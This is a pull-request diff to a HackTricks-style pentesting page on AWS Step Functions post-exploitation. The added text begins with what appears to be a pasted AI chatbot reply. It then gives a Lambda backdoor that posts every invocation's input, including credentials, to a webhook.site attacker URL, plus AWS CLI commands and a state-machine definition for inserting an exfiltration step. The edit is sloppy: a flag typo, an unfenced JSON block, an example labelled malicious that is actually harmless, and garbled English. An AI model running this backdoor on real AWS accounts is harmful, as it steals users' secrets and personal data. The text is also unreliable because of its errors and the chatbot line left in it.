arte-mr.kluo-UpdateStateMachine

Author: kluo84

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md

@@ -71,67 +71,133 @@ aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
 
 **Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
 
-### `states:UpdateStateMachine`
+Absolutely — here's your **PR-ready write-up** in the requested format, aligned with the `HackTricks` style you've been following.
 
-This permission allows an attacker to **modify the logic of an existing state machine**. By injecting malicious logic into the state definition, the attacker could:
+---
 
-- Add a **new state** that exfiltrates input/output to an external system (via Lambda or SNS).
-- **Bypass security checks**, skip validation steps, or disable error handling.
-- **Insert a logic bomb** that triggers under specific input conditions to disrupt execution.
+### `states:UpdateStateMachine`, `lambda:UpdateFunctionCode`
 
-This attack can be subtle, blending into large state definitions, and may go unnoticed without strict ASL version control.
+An attacker who compromises a user or role with the following permissions:
+
+```json
+{
+  "Version": "2012-10-17",
+  "Statement": [
+    {
+      "Sid": "AllowUpdateStateMachine",
+      "Effect": "Allow",
+      "Action": "states:UpdateStateMachine",
+      "Resource": "*"
+    },
+    {
+      "Sid": "AllowUpdateFunctionCode",
+      "Effect": "Allow",
+      "Action": "lambda:UpdateFunctionCode",
+      "Resource": "*"
+    }
+  ]
+}
+```
+
+...can conduct a **high-impact and stealthy post-exploitation attack** by combining Lambda backdooring with Step Function logic manipulation.
+
+This scenario assumes that the victim uses **AWS Step Functions to orchestrate workflows that process sensitive input**, such as credentials, tokens, or PII.
+
+Example victim invocation:
 
 ```bash
-aws stepfunctions update-state-machine \
-  --state-machine-arn <value> \
-  --definition file://malicious_state_definition.json \
-  --role-arn arn:aws:iam::<account-id>:role/<execution-role>
+aws stepfunctions start-execution \
+  --state-machine-arn arn:aws:states:us-east-1:<victim-account-id>:stateMachine:LegitStateMachine \
+  --input '{"email": "victim@example.com", "password": "hunter2"}' --profile victim
 ```
 
-`malicious_state_definition.json`
+If the Step Function is configured to invoke a Lambda like `LegitBusinessLogic`, the attacker can proceed with **two stealthy attack variants**:
 
-```json
+---
+
+####  Updated the lambda function
+
+The attacker modifies the code of the Lambda function already used by the Step Function (`LegitBusinessLogic`) to silently exfiltrate input data.
+
+```python
+# send_to_attacker.py
+import requests
+
+def lambda_handler(event, context):
+    requests.post("https://webhook.site/<attacker-id>/exfil", json=event)
+    return {"status": "exfiltrated"}
+```
+
+```bash
+zip function.zip send_to_attacker.py
+
+aws lambda update-function-code \
+  --function-name LegitBusinessLogic \
+  --zip-file fileb://function.zip -profile attacker
+```
+
+---
+
+#### Add a Malicious State to the Step Function
+
+Alternatively, the attacker can inject an **exfiltration state** at the beginning of the workflow by updating the Step Function definition.
+
+```malicious_state_definition.json
 {
-  "Comment": "Malicious State Machine - Data Exfiltration",
+  "Comment": "Backdoored for Exfiltration",
+  "StartAt": "OriginalState",
+  "States": {
+    "OriginalState": {
+      "Type": "Task",
+      "Resource": "arn:aws:lambda:us-east-1:<victim-id>:function:LegitBusinessLogic",
+      "End": true
+    }
+  }
+}
+
+```
+
+```bash
+aws stepfunctions update-state-machine \
+  --state-machine-arn arn:aws:states:us-east-1:<victim-id>:stateMachine:LegitStateMachine \
+  --definition file://malicious_state_definition.json --profile attacker
+```
+
+The attacker can even more stealthy to update the state definition to something like this 
+{
+  "Comment": "Backdoored for Exfiltration",
   "StartAt": "ExfiltrateSecrets",
   "States": {
     "ExfiltrateSecrets": {
       "Type": "Task",
-      "Resource": "arn:aws:lambda:us-east-1:123456789012:function:SendToAttacker",
+      "Resource": "arn:aws:lambda:us-east-1:victim-id:function:SendToAttacker",
       "InputPath": "$",
-      "ResultPath": "$.exfiltration_result",
-      "Next": "LegitimateStep"
+      "ResultPath": "$.exfil",
+      "Next": "OriginalState"
     },
-    "LegitimateStep": {
+    "OriginalState": {
       "Type": "Task",
-      "Resource": "arn:aws:lambda:us-east-1:123456789012:function:LegitBusinessLogic",
+      "Resource": "arn:aws:lambda:us-east-1:victim-id:function:LegitBusinessLogic",
       "End": true
     }
-  }
+  }  
 }
-```
-- **Potential Impact**: Data exfiltration, disruption of logic flow, persistent access through hidden states.
+ where the victim won't realize the different 
 
 ---
 
-### `states:StartExecution`
+### Victim Setup (Context for Exploit)
 
-With this permission, an attacker can **trigger executions on demand**, passing arbitrary input to state machines. This allows:
+- A Step Function (`LegitStateMachine`) is used to process sensitive user input.
+- It calls one or more Lambda functions such as `LegitBusinessLogic`.
 
-- **Triggering sensitive operations** (e.g., Lambda invocations, EC2 actions) if the workflow handles them.
-- **Supplying attacker-controlled input** to abuse poorly validated states.
-- **Recon of business logic** by probing execution responses or failures.
-
-Used with `states:GetExecutionHistory`, it becomes a powerful tool for **logic discovery**, **abuse**, or **command execution** through embedded Lambdas or activities.
-
-```bash
-aws stepfunctions start-execution \
-  --state-machine-arn <value> \
-  --name "backdoor-$(date +%s)" \
-  --input '{"command":"whoami"}'
-```
+---
 
-- **Potential Impact**: Unauthorized triggering of sensitive workflows, business logic abuse, stealthy persistence (can be cron-triggered via EventBridge).
+**Potential Impact**:  
+- Silent exfiltration of sensitive data including secrets, credentials, API keys, and PII.
+- No visible errors or failures in workflow execution.
+- Difficult to detect without auditing Lambda code or execution traces.
+- Enables long-term persistence if backdoor remains in code or ASL logic.
 
 
 {{#include ../../../banners/hacktricks-training.md}}